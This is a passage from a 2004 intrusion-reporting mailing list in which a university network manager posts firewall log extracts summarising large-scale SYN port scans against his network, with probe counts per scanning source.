83.114.29.176:22002 -> xxx.yyy.71.94:1080 SYN ******S* Jul 7 12:39:17 83.114.29.176:22002 -> xxx.yyy.71.94:10080 SYN ******S* Jul 7 12:39:17 83.114.29.176:22002 -> xxx.yyy.71.94:3128 SYN ******S* Jul 7 12:39:17 83.114.29.176:22002 -> xxx.yyy.71.95:3127 SYN ******S* 19373 Jul 7 02:55:08 202.130.162.216:5571 -> xxx.yyy.10.132:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:2774 -> xxx.yyy.10.133:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:5407 -> xxx.yyy.10.134:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:3294 -> xxx.yyy.10.135:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:2885 -> xxx.yyy.10.136:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:3258 -> xxx.yyy.10.137:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:4348 -> xxx.yyy.10.138:80 SYN ******S* Jul 7 02:55:08 202.130.162.216:4021 -> xxx.yyy.10.139:80 SYN ******S* [...] Jul 7 03:02:44 202.130.162.216:3512 -> xxx.yyy.253.21:80 SYN ******S* Jul 7 03:02:44 202.130.162.216:5008 -> xxx.yyy.253.34:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:2193 -> xxx.yyy.252.63:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:3803 -> xxx.yyy.252.48:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:4213 -> xxx.yyy.252.96:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:5459 -> xxx.yyy.252.87:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:3721 -> xxx.yyy.252.84:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:5315 -> xxx.yyy.252.59:80 SYN ******S* Jul 7 03:02:43 202.130.162.216:4266 -> xxx.yyy.252.69:80 SYN ******S* 19286 Jul 7 23:56:09 221.165.91.208:3453 -> xxx.yyy.194.126:5554 SYN ******S* Jul 7 23:56:10 221.165.91.208:3969 -> xxx.yyy.194.126:1023 SYN ******S* Jul 7 23:56:12 221.165.91.208:1469 -> xxx.yyy.194.126:9898 SYN ******S* Jul 7 23:56:09 221.165.91.208:3451 -> xxx.yyy.194.124:5554 SYN ******S* Jul 7 23:56:10 221.165.91.208:3967 -> xxx.yyy.194.124:1023 SYN ******S* Jul 7 23:56:12 221.165.91.208:1467 -> xxx.yyy.194.124:9898 SYN ******S* Jul 7 23:56:09 221.165.91.208:3452 -> xxx.yyy.194.125:5554 SYN ******S* Jul 7 23:56:10 221.165.91.208:3968 -> xxx.yyy.194.125:1023 SYN ******S* [...] Jul 7 23:56:53 221.165.91.208:1283 -> xxx.yyy.214.232:9898 SYN ******S* Jul 7 23:56:53 221.165.91.208:1282 -> xxx.yyy.214.231:9898 SYN ******S* Jul 7 23:56:53 221.165.91.208:1286 -> xxx.yyy.214.235:9898 SYN ******S* Jul 7 23:56:54 221.165.91.208:1312 -> xxx.yyy.214.243:9898 SYN ******S* Jul 7 23:56:54 221.165.91.208:1302 -> xxx.yyy.214.241:9898 SYN ******S* Jul 7 23:56:54 221.165.91.208:1313 -> xxx.yyy.214.244:9898 SYN ******S* Jul 7 23:56:54 221.165.91.208:1314 -> xxx.yyy.214.245:9898 SYN ******S* Jul 7 23:56:54 221.165.91.208:1320 -> xxx.yyy.214.246:9898 SYN ******S* 13899 Jul 7 23:56:20 220.126.24.248:2015 -> xxx.yyy.215.46:5554 SYN ******S* Jul 7 23:56:21 220.126.24.248:2859 -> xxx.yyy.215.46:1023 SYN ******S* Jul 7 23:56:23 220.126.24.248:1125 -> xxx.yyy.215.46:9898 SYN ******S* Jul 7 23:56:20 220.126.24.248:2022 -> xxx.yyy.215.47:5554 SYN ******S* Jul 7 23:56:21 220.126.24.248:2863 -> xxx.yyy.215.47:1023 SYN ******S* Jul 7 23:56:23 220.126.24.248:1127 -> xxx.yyy.215.47:9898 SYN ******S* Jul 7 23:56:20 220.126.24.248:2013 -> xxx.yyy.215.44:5554 SYN ******S* Jul 7 23:56:21 220.126.24.248:2857 -> xxx.yyy.215.44:1023 SYN ******S* [...] Jul 7 23:57:05 220.126.24.248:2710 -> xxx.yyy.235.105:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2711 -> xxx.yyy.235.106:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2757 -> xxx.yyy.235.109:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2754 -> xxx.yyy.235.107:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2756 -> xxx.yyy.235.108:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2768 -> xxx.yyy.235.111:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2767 -> xxx.yyy.235.110:9898 SYN ******S* Jul 7 23:57:05 220.126.24.248:2769 -> xxx.yyy.235.112:9898 SYN ******S* 13359 Jul 7 00:56:07 221.218.18.109:1905 -> xxx.yyy.133.14:5554 SYN ******S* Jul 7 00:56:08 221.218.18.109:2654 -> xxx.yyy.133.14:1023 SYN ******S* Jul 7 00:56:10 221.218.18.109:4523 -> xxx.yyy.133.14:9898 SYN ******S* Jul 7 00:56:07 221.218.18.109:1912 -> xxx.yyy.133.18:5554 SYN ******S* Jul 7 00:56:08 221.218.18.109:2675 -> xxx.yyy.133.18:1023 SYN ******S* Jul 7 00:56:10 221.218.18.109:4528 -> xxx.yyy.133.18:9898 SYN ******S* Jul 7 00:56:07 221.218.18.109:1918 -> xxx.yyy.133.20:5554 SYN ******S* Jul 7 00:56:08 221.218.18.109:2650 -> xxx.yyy.133.20:1023 SYN ******S* [...] Jul 7 00:57:52 221.218.18.109:3215 -> xxx.yyy.153.111:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3226 -> xxx.yyy.153.113:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3220 -> xxx.yyy.153.112:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3230 -> xxx.yyy.153.114:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3234 -> xxx.yyy.153.115:9898 SYN ******S* Jul 7 00:57:52 221.218.18.109:3237 -> xxx.yyy.153.117:9898 SYN ******S* Jul 7 00:57:53 221.218.18.109:3919 -> xxx.yyy.153.118:9898 SYN ******S* Jul 7 00:57:53 221.218.18.109:3922 -> xxx.yyy.153.119:9898 SYN ******S* 13143 Jul 7 23:56:41 220.127.123.230:1146 -> xxx.yyy.154.245:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4899 -> xxx.yyy.154.245:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:4704 -> xxx.yyy.154.232:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4506 -> xxx.yyy.154.232:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:4705 -> xxx.yyy.154.233:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4507 -> xxx.yyy.154.233:1023 SYN ******S* Jul 7 23:56:41 220.127.123.230:1441 -> xxx.yyy.154.248:5554 SYN ******S* Jul 7 23:56:42 220.127.123.230:4926 -> xxx.yyy.154.248:1023 SYN ******S* [...] Jul 7 23:57:27 220.127.123.230:4604 -> xxx.yyy.156.35:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4609 -> xxx.yyy.156.37:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4421 -> xxx.yyy.156.24:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4438 -> xxx.yyy.156.25:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4468 -> xxx.yyy.156.27:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4473 -> xxx.yyy.156.28:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4492 -> xxx.yyy.156.30:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4498 -> xxx.yyy.156.31:9898 SYN ******S* Jul 7 23:57:27 220.127.123.230:4606 -> xxx.yyy.156.36:9898 SYN ******S* 12798 Jul 7 04:41:18 61.217.39.19:1856 -> xxx.yyy.1.1:4899 SYN ******S* Jul 7 04:41:18 61.217.39.19:1857 -> xxx.yyy.1.2:4899 SYN ******S* Jul 7 04:41:18 61.217.39.19:1858 -> xxx.yyy.1.3:4899 SYN ******S* Jul 7 04:41:19 61.217.39.19:1860 -> xxx.yyy.1.5:4899 SYN ******S* Jul 7 04:41:19 61.217.39.19:1861 -> xxx.yyy.1.6:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1863 -> xxx.yyy.1.8:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1864 -> xxx.yyy.1.9:4899 SYN ******S* Jul 7 04:41:17 61.217.39.19:1865 -> xxx.yyy.1.10:4899 SYN ******S* [...] Jul 7 05:09:20 61.217.39.19:2821 -> xxx.yyy.81.121:4899 SYN ******S* Jul 7 05:09:20 61.217.39.19:2822 -> xxx.yyy.81.122:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2823 -> xxx.yyy.81.123:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2824 -> xxx.yyy.81.124:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2828 -> xxx.yyy.81.128:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2825 -> xxx.yyy.81.125:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2829 -> xxx.yyy.81.129:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2826 -> xxx.yyy.81.126:4899 SYN ******S* Jul 7 05:09:21 61.217.39.19:2827 -> xxx.yyy.81.127:4899 SYN ******S* 12685 Jul 7 00:56:49 221.217.209.25:2497 -> xxx.yyy.215.240:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3042 -> xxx.yyy.215.240:1023 SYN ******S* Jul 7 00:56:52 221.217.209.25:3952 -> xxx.yyy.215.240:9898 SYN ******S* Jul 7 00:56:49 221.217.209.25:2495 -> xxx.yyy.215.243:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3019 -> xxx.yyy.215.243:1023 SYN ******S* Jul 7 00:56:52 221.217.209.25:3920 -> xxx.yyy.215.243:9898 SYN ******S* Jul 7 00:56:49 221.217.209.25:2496 -> xxx.yyy.215.241:5554 SYN ******S* Jul 7 00:56:50 221.217.209.25:3020 -> xxx.yyy.215.241:1023 SYN ******S* [...] Jul 7 00:57:36 221.217.209.25:4058 -> xxx.yyy.236.36:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4059 -> xxx.yyy.236.37:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4069 -> xxx.yyy.236.38:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4070 -> xxx.yyy.236.39:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4084 -> xxx.yyy.236.40:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4085 -> xxx.yyy.236.41:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4087 -> xxx.yyy.236.43:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4088 -> xxx.yyy.236.44:9898 SYN ******S* Jul 7 00:57:36 221.217.209.25:4089 -> xxx.yyy.236.45:9898 SYN ******S* 12409 Jul 7 00:56:33 61.55.212.113:1276 -> xxx.yyy.174.5:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4629 -> xxx.yyy.174.5:1023 SYN ******S* Jul 7 00:56:36 61.55.212.113:4835 -> xxx.yyy.174.5:9898 SYN ******S* Jul 7 00:56:33 61.55.212.113:1219 -> xxx.yyy.174.2:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4597 -> xxx.yyy.174.2:1023 SYN ******S* Jul 7 00:56:36 61.55.212.113:4830 -> xxx.yyy.174.2:9898 SYN ******S* Jul 7 00:56:33 61.55.212.113:1231 -> xxx.yyy.174.3:5554 SYN ******S* Jul 7 00:56:34 61.55.212.113:4619 -> xxx.yyy.174.3:1023 SYN ******S* [...] Jul 7 00:57:36 61.55.212.113:4884 -> xxx.yyy.193.212:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4878 -> xxx.yyy.193.211:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4885 -> xxx.yyy.193.213:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4893 -> xxx.yyy.193.214:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4919 -> xxx.yyy.193.218:9898 SYN ******S* Jul 7 00:57:36 61.55.212.113:4896 -> xxx.yyy.193.215:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3737 -> xxx.yyy.194.123:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3740 -> xxx.yyy.194.124:9898 SYN ******S* Jul 7 00:57:39 61.55.212.113:3734 -> xxx.yyy.194.122:9898 SYN ******S* 12386 Jul 7 00:54:05 221.192.68.104:2100 -> xxx.yyy.236.95:5554 SYN ******S* Jul 7 00:54:07 221.192.68.104:3044 -> xxx.yyy.236.95:1023 SYN ******S* Jul 7 00:54:05 221.192.68.104:2102 -> xxx.yyy.236.93:5554 SYN ******S* Jul 7 00:54:06 221.192.68.104:3045 -> xxx.yyy.236.93:1023 SYN ******S* Jul 7 00:54:05 221.192.68.104:2097 -> xxx.yyy.236.99:5554 SYN ******S* Jul 7 00:54:06 221.192.68.104:2987 -> xxx.yyy.236.99:1023 SYN ******S* Jul 7 00:54:08 221.192.68.104:1180 -> xxx.yyy.236.99:9898 SYN ******S* Jul 7 00:54:05 221.192.68.104:2104 -> xxx.yyy.236.91:5554 SYN ******S* [...] Jul 7 00:54:46 221.192.68.104:2321 -> xxx.yyy.255.232:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2336 -> xxx.yyy.255.247:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2334 -> xxx.yyy.255.246:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2333 -> xxx.yyy.255.245:9898 SYN ******S* Jul 7 00:54:46 221.192.68.104:2343 -> xxx.yyy.255.239:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2354 -> xxx.yyy.255.240:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2351 -> xxx.yyy.255.241:9898 SYN ******S* Jul 7 00:54:47 221.192.68.104:2352 -> xxx.yyy.255.243:9898 SYN ******S* 10766 Jul 7 00:56:28 221.217.157.102:4876 -> xxx.yyy.153.137:5554 SYN ******S* Jul 7 00:56:31 221.217.157.102:3250 -> xxx.yyy.153.137:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4879 -> xxx.yyy.153.138:5554 SYN ******S* Jul 7 00:56:31 221.217.157.102:3251 -> xxx.yyy.153.138:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4882 -> xxx.yyy.153.136:5554 SYN ******S* Jul 7 00:56:29 221.217.157.102:1614 -> xxx.yyy.153.136:1023 SYN ******S* Jul 7 00:56:31 221.217.157.102:3320 -> xxx.yyy.153.136:9898 SYN ******S* Jul 7 00:56:28 221.217.157.102:4890 -> xxx.yyy.153.139:5554 SYN ******S* [...] Jul 7 00:57:13 221.217.157.102:2629 -> xxx.yyy.173.164:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2781 -> xxx.yyy.173.255:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2783 -> xxx.yyy.174.1:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2795 -> xxx.yyy.173.252:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2794 -> xxx.yyy.173.248:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2817 -> xxx.yyy.173.247:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2819 -> xxx.yyy.173.244:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2821 -> xxx.yyy.173.227:9898 SYN ******S* Jul 7 00:57:13 221.217.157.102:2825 -> xxx.yyy.174.2:9898 SYN ******S* 10398 Jul 7 01:09:00 218.61.154.25:3644 -> xxx.yyy.64.0:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3977 -> xxx.yyy.64.0:1023 SYN ******S* Jul 7 01:09:03 218.61.154.25:3047 -> xxx.yyy.64.0:9898 SYN ******S* Jul 7 01:09:00 218.61.154.25:3645 -> xxx.yyy.64.1:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3978 -> xxx.yyy.64.1:1023 SYN ******S* Jul 7 01:09:03 218.61.154.25:3048 -> xxx.yyy.64.1:9898 SYN ******S* Jul 7 01:09:00 218.61.154.25:3646 -> xxx.yyy.64.2:5554 SYN ******S* Jul 7 01:09:01 218.61.154.25:3979 -> xxx.yyy.64.2:1023 SYN ******S* [...] Jul 7 01:09:24 218.61.154.25:3349 -> xxx.yyy.72.117:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3350 -> xxx.yyy.72.118:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3352 -> xxx.yyy.72.120:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3351 -> xxx.yyy.72.119:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3353 -> xxx.yyy.72.122:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3354 -> xxx.yyy.72.121:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3356 -> xxx.yyy.72.123:9898 SYN ******S* Jul 7 01:09:24 218.61.154.25:3357 -> xxx.yyy.72.124:9898 SYN ******S* 6241 -- - Ken =========================================================================== Ken Connelly (KC152) Systems and Operations Manager, ITS - Network Services University of Northern Iowa Cedar Falls, IA 50614-0121 email: Ken.Connelly at uni.edu phone: (319) 273-5850 fax: (319) 273-7373 From Ken.Connelly at uni.edu Fri Jul 9 12:46:13 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Fri, 09 Jul 2004 07:46:13 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LC90BASQPW8YBZ2Y@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jul 8 18:18:31 220.76.135.154:5116 -> xxx.yyy.1.0:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:3070 -> xxx.yyy.1.2:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:5119 -> xxx.yyy.1.3:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:3074 -> xxx.yyy.1.6:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:3069 -> xxx.yyy.1.1:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:3072 -> xxx.yyy.1.4:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:3073 -> xxx.yyy.1.5:25 SYN ******S* Jul 8 18:18:31 220.76.135.154:1028 -> xxx.yyy.1.7:25 SYN ******S* [...] Jul 8 18:24:38 220.76.135.154:1911 -> xxx.yyy.255.247:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:1924 -> xxx.yyy.255.253:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3969 -> xxx.yyy.255.250:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3953 -> xxx.yyy.255.245:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3954 -> xxx.yyy.255.246:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3974 -> xxx.yyy.255.254:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3962 -> xxx.yyy.255.248:25 SYN ******S* Jul 8 18:24:38 220.76.135.154:3970 -> xxx.yyy.255.251:25 SYN ******S* 111015 Jul 8 16:33:56 218.162.51.187:3115 -> xxx.yyy.1.1:1433 SYN ******S* Jul 8 16:33:56 218.162.51.187:3116 -> xxx.yyy.1.2:1433 SYN ******S* Jul 8 16:33:56 218.162.51.187:3117 -> xxx.yyy.1.3:1433 SYN ******S* Jul 8 16:33:53 218.162.51.187:3118 -> xxx.yyy.1.4:1433 SYN ******S* Jul 8 16:33:53 218.162.51.187:3119 -> xxx.yyy.1.5:1433 SYN ******S* Jul 8 16:33:56 218.162.51.187:3120 -> xxx.yyy.1.6:1433 SYN ******S* Jul 8 16:33:56 218.162.51.187:3121 -> xxx.yyy.1.7:1433 SYN ******S* Jul 8 16:33:56 218.162.51.187:3122 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jul 8 16:45:02 218.162.51.187:3884 -> xxx.yyy.255.246:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3902 -> xxx.yyy.255.248:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3904 -> xxx.yyy.255.249:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3905 -> xxx.yyy.255.250:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3906 -> xxx.yyy.255.251:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3907 -> xxx.yyy.255.252:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3908 -> xxx.yyy.255.253:1433 SYN ******S* Jul 8 16:45:02 218.162.51.187:3909 -> xxx.yyy.255.254:1433 SYN ******S* 74110 Jul 8 05:16:37 216.55.155.39:3868 -> xxx.yyy.1.1:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3869 -> xxx.yyy.1.2:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3870 -> xxx.yyy.1.3:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3871 -> xxx.yyy.1.4:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3872 -> xxx.yyy.1.5:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3873 -> xxx.yyy.1.6:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3875 -> xxx.yyy.1.8:1433 SYN ******S* Jul 8 05:16:37 216.55.155.39:3874 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 8 05:27:31 216.55.155.39:4751 -> xxx.yyy.255.170:1433 SYN ******S* Jul 8 05:27:31 216.55.155.39:4752 -> xxx.yyy.255.171:1433 SYN ******S* Jul 8 05:27:31 216.55.155.39:4753 -> xxx.yyy.255.172:1433 SYN ******S* Jul 8 05:27:31 216.55.155.39:4754 -> xxx.yyy.255.173:1433 SYN ******S* Jul 8 05:27:31 216.55.155.39:4755 -> xxx.yyy.255.174:1433 SYN ******S* Jul 8 05:27:31 216.55.155.39:4756 -> xxx.yyy.255.175:1433 SYN ******S* Jul 8 05:27:32 216.55.155.39:4758 -> xxx.yyy.255.177:1433 SYN ******S* Jul 8 05:27:32 216.55.155.39:4760 -> xxx.yyy.255.178:1433 SYN ******S* Jul 8 05:27:32 216.55.155.39:4761 -> xxx.yyy.255.179:1433 SYN ******S* 73658 Jul 8 13:56:54 80.80.19.12:3950 -> xxx.yyy.1.1:139 SYN ******S* Jul 8 13:56:54 80.80.19.12:3951 -> xxx.yyy.1.2:139 SYN ******S* Jul 8 13:56:51 80.80.19.12:3952 -> xxx.yyy.1.3:139 SYN ******S* Jul 8 13:56:51 80.80.19.12:3953 -> xxx.yyy.1.4:139 SYN ******S* Jul 8 13:56:54 80.80.19.12:3954 -> xxx.yyy.1.5:139 SYN ******S* Jul 8 13:56:54 80.80.19.12:3955 -> xxx.yyy.1.6:139 SYN ******S* Jul 8 13:56:54 80.80.19.12:3956 -> xxx.yyy.1.7:139 SYN ******S* Jul 8 13:56:54 80.80.19.12:3957 -> xxx.yyy.1.8:139 SYN ******S* [...] Jul 8 14:07:51 80.80.19.12:3304 -> xxx.yyy.255.243:139 SYN ******S* Jul 8 14:07:51 80.80.19.12:3305 -> xxx.yyy.255.244:139 SYN ******S* Jul 8 14:07:51 80.80.19.12:3311 -> xxx.yyy.255.250:139 SYN ******S* Jul 8 14:07:51 80.80.19.12:3308 -> xxx.yyy.255.247:139 SYN ******S* Jul 8 14:07:51 80.80.19.12:3309 -> xxx.yyy.255.248:139 SYN ******S* Jul 8 14:07:52 80.80.19.12:3313 -> xxx.yyy.255.252:139 SYN ******S* Jul 8 14:07:52 80.80.19.12:3314 -> xxx.yyy.255.253:139 SYN ******S* Jul 8 14:07:52 80.80.19.12:3315 -> xxx.yyy.255.254:139 SYN ******S* 72718 Jul 8 19:40:36 212.239.30.80:2718 -> xxx.yyy.1.1:6129 SYN ******S* Jul 8 19:40:36 212.239.30.80:2719 -> xxx.yyy.1.2:6129 SYN ******S* Jul 8 19:40:36 212.239.30.80:2720 -> xxx.yyy.1.3:6129 SYN ******S* Jul 8 19:40:38 212.239.30.80:2721 -> xxx.yyy.1.4:6129 SYN ******S* Jul 8 19:40:38 212.239.30.80:2722 -> xxx.yyy.1.5:6129 SYN ******S* Jul 8 19:40:38 212.239.30.80:2723 -> xxx.yyy.1.6:6129 SYN ******S* Jul 8 19:40:38 212.239.30.80:2724 -> xxx.yyy.1.7:6129 SYN ******S* Jul 8 19:40:38 212.239.30.80:2725 -> xxx.yyy.1.8:6129 SYN ******S* [...] Jul 8 19:52:21 212.239.30.80:1553 -> xxx.yyy.255.248:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1547 -> xxx.yyy.255.242:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1550 -> xxx.yyy.255.245:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1554 -> xxx.yyy.255.249:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1551 -> xxx.yyy.255.246:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1558 -> xxx.yyy.255.253:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1559 -> xxx.yyy.255.254:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1556 -> xxx.yyy.255.251:6129 SYN ******S* Jul 8 19:52:21 212.239.30.80:1557 -> xxx.yyy.255.252:6129 SYN ******S* 70965 Jul 8 10:42:08 62.231.136.150:1782 -> xxx.yyy.1.1:15001 SYN ******S* Jul 8 10:42:08 62.231.136.150:1783 -> xxx.yyy.1.2:15001 SYN ******S* Jul 8 10:42:08 62.231.136.150:1784 -> xxx.yyy.1.3:15001 SYN ******S* Jul 8 10:42:09 62.231.136.150:1785 -> xxx.yyy.1.4:15001 SYN ******S* Jul 8 10:42:07 62.231.136.150:1786 -> xxx.yyy.1.5:15001 SYN ******S* Jul 8 10:42:10 62.231.136.150:1787 -> xxx.yyy.1.6:15001 SYN ******S* Jul 8 10:42:10 62.231.136.150:1788 -> xxx.yyy.1.7:15001 SYN ******S* Jul 8 10:42:10 62.231.136.150:1789 -> xxx.yyy.1.8:15001 SYN ******S* [...] Jul 8 10:53:01 62.231.136.150:4401 -> xxx.yyy.255.219:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4398 -> xxx.yyy.255.216:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4659 -> xxx.yyy.255.223:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4664 -> xxx.yyy.255.228:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4661 -> xxx.yyy.255.225:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4668 -> xxx.yyy.255.232:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4665 -> xxx.yyy.255.229:15001 SYN ******S* Jul 8 10:53:01 62.231.136.150:4662 -> xxx.yyy.255.226:15001 SYN ******S* Jul 8 10:53:02 62.231.136.150:4679 -> xxx.yyy.255.243:15001 SYN ******S* 70529 Jul 8 07:58:46 211.220.191.43:2057 -> xxx.yyy.1.1:1433 SYN ******S* Jul 8 07:58:46 211.220.191.43:2058 -> xxx.yyy.1.2:1433 SYN ******S* Jul 8 07:58:43 211.220.191.43:2060 -> xxx.yyy.1.4:1433 SYN ******S* Jul 8 07:58:46 211.220.191.43:2061 -> xxx.yyy.1.5:1433 SYN ******S* Jul 8 07:58:43 211.220.191.43:2059 -> xxx.yyy.1.3:1433 SYN ******S* Jul 8 07:58:46 211.220.191.43:2062 -> xxx.yyy.1.6:1433 SYN ******S* Jul 8 07:58:46 211.220.191.43:2064 -> xxx.yyy.1.8:1433 SYN ******S* Jul 8 07:58:46 211.220.191.43:2063 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jul 8 08:10:24 211.220.191.43:4378 -> xxx.yyy.255.245:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4379 -> xxx.yyy.255.246:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4382 -> xxx.yyy.255.249:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4383 -> xxx.yyy.255.250:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4377 -> xxx.yyy.255.244:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4381 -> xxx.yyy.255.248:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4384 -> xxx.yyy.255.251:1433 SYN ******S* Jul 8 08:10:24 211.220.191.43:4387 -> xxx.yyy.255.254:1433 SYN ******S* 70345 Jul 8 10:19:30 202.9.128.56:1560 -> xxx.yyy.1.1:8000 SYN ******S* Jul 8 10:19:30 202.9.128.56:1561 -> xxx.yyy.1.2:8000 SYN ******S* Jul 8 10:19:30 202.9.128.56:1562 -> xxx.yyy.1.3:8000 SYN ******S* Jul 8 10:19:32 202.9.128.56:1563 -> xxx.yyy.1.4:8000 SYN ******S* Jul 8 10:19:29 202.9.128.56:1564 -> xxx.yyy.1.5:8000 SYN ******S* Jul 8 10:19:29 202.9.128.56:1565 -> xxx.yyy.1.6:8000 SYN ******S* Jul 8 10:19:32 202.9.128.56:1566 -> xxx.yyy.1.7:8000 SYN ******S* Jul 8 10:19:32 202.9.128.56:1567 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jul 8 13:54:02 202.9.128.56:16701 -> xxx.yyy.237.3:1433 SYN ******S* Jul 8 13:54:02 202.9.128.56:16716 -> 